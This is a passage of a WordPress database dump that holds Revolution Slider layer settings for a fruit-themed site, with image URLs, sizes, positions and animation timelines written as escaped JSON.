":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":290},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":980,\"start\":290,\"startRelative\":290},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":980,\"start\":290,\"startRelative\":290},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1750,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"15\":{\"text\":\"Image 12\",\"alias\":\"Seed\",\"uid\":15,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic8.png\",\"imageId\":2612},\"size\":{\"width\":{\"d\":{\"v\":\"44px\",\"e\":true},\"n\":{\"v\":\"44px\",\"e\":true},\"t\":{\"v\":\"44px\"},\"m\":{\"v\":\"27px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"54px\",\"e\":true},\"n\":{\"v\":\"54px\",\"e\":true},\"t\":{\"v\":\"54px\"},\"m\":{\"v\":\"33px\",\"e\":true}},\"originalWidth\":47,\"originalHeight\":58,\"aspectRatio\":{\"d\":{\"v\":0.810344827586206850611461049993522465229034423828125},\"n\":{\"v\":0.810344827586206850611461049993522465229034423828125},\"t\":{\"v\":0.810344827586206850611461049993522465229034423828125},\"m\":{\"v\":0.810344827586206850611461049993522465229034423828125}}},\"position\":{\"x\":{\"d\":{\"v\":\"720px\",\"e\":true},\"n\":{\"v\":\"557px\",\"e\":true},\"t\":{\"v\":\"213px\",\"e\":true},\"m\":{\"v\":\"60px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"284px\",\"e\":true},\"n\":{\"v\":\"211px\",\"e\":true},\"t\":{\"v\":\"157px\",\"e\":true},\"m\":{\"v\":\"102px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":15,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"{-90,180}\",\"rotationY\":\"180deg\",\"rotationZ\":\"[-50|180]\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1290,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1290,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"16\":{\"text\":\"Image 13\",\"alias\":\"Seed1\",\"uid\":16,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic9.png\",\"imageId\":2613},\"size\":{\"width\":{\"d\":{\"v\":\"56px\",\"e\":true},\"n\":{\"v\":\"59px\",\"e\":true},\"t\":{\"v\":\"59px\",\"e\":true},\"m\":{\"v\":\"38px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"63px\",\"e\":true},\"n\":{\"v\":\"66px\",\"e\":true},\"t\":{\"v\":\"66px\",\"e\":true},\"m\":{\"v\":\"43px\",\"e\":true}},\"originalWidth\":76,\"originalHeight\":66,\"aspectRatio\":{\"d\":{\"v\":1.1515151515151516026236322431941516697406768798828125},\"n\":{\"v\":1.1515151515151516026236322431941516697406768798828125},\"t\":{\"v\":1.1515151515151516026236322431941516697406768798828125},\"m\":{\"v\":1.1515151515151516026236322431941516697406768798828125}}},\"position\":{\"x\":{\"d\":{\"v\":\"682px\",\"e\":true},\"n\":{\"v\":\"510px\",\"e\":true},\"t\":{\"v\":\"176px\",\"e\":true},\"m\":{\"v\":\"67px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"126px\",\"e\":true},\"n\":{\"v\":\"101px\",\"e\":true},\"t\":{\"v\":\"67px\",\"e\":true},\"m\":{\"v\":\"18px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":16,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":80},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,360}\",\"rotationY\":\"{-90,60}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1460,\"start\":80,\"startRelative\":80},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":2,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1460,\"start\":80,\"startRelative\":80},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1480,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"17\":{\"text\":\"Image 13\",\"alias\":\"Image 13\",\"uid\":17,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/h1-slide1.png\",\"imageId\":4225},\"size\":{\"width\":{\"d\":{\"v\":\"399px\",\"e\":true},\"n\":{\"v\":\"310px\",\"e\":true},\"t\":{\"v\":\"286px\",\"e\":true},\"m\":{\"v\":\"142px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"399px\",\"e\":true},\"n\":{\"v\":\"310px\",\"e\":true},\"t\":{\"v\":\"286px\",\"e\":true},\"m\":{\"v\":\"142px\",\"e\":true}},\"originalWidth\":399,\"originalHeight\":399,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-676px\",\"e\":true},\"n\":{\"v\":\"-426px\",\"e\":true},\"t\":{\"v\":\"-204px\",\"e\":true},\"m\":{\"v\":\"-114px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"473px\",\"e\":true},\"n\":{\"v\":\"293px\",\"e\":true},\"t\":{\"v\":\"388px\",\"e\":true},\"m\":{\"v\":\"248px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":17,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":\"90deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power1.easeOut\",\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power1.easeOut\",\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3020,\"startRelative\":2720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(6,3,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/back-pear.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"02\"},{\"v\":\"03\"}]},\"timeline\":{\"transition\":[\"slideoverright\"],\"slots\":[\"default\"],\"duration\":[\"80\"]}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Ananas\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic1.png\",\"imageId\":1074},\"size\":{\"width\":{\"d\":{\"v\":\"518px\",\"e\":true},\"n\":{\"v\":\"359px\",\"e\":true},\"t\":{\"v\":\"363px\",\"e\":true},\"m\":{\"v\":\"196px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"523px\",\"e\":true},\"n\":{\"v\":\"362px\",\"e\":true},\"t\":{\"v\":\"367px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":518,\"originalHeight\":523,\"aspectRatio\":{\"d\":{\"v\":0.99043977055449328172898049160721711814403533935546875},\"n\":{\"v\":0.99043977055449328172898049160721711814403533935546875},\"t\":{\"v\":0.99043977055449328172898049160721711814403533935546875},\"m\":{\"v\":0.99043977055449328172898049160721711814403533935546875}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"-55px\",\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 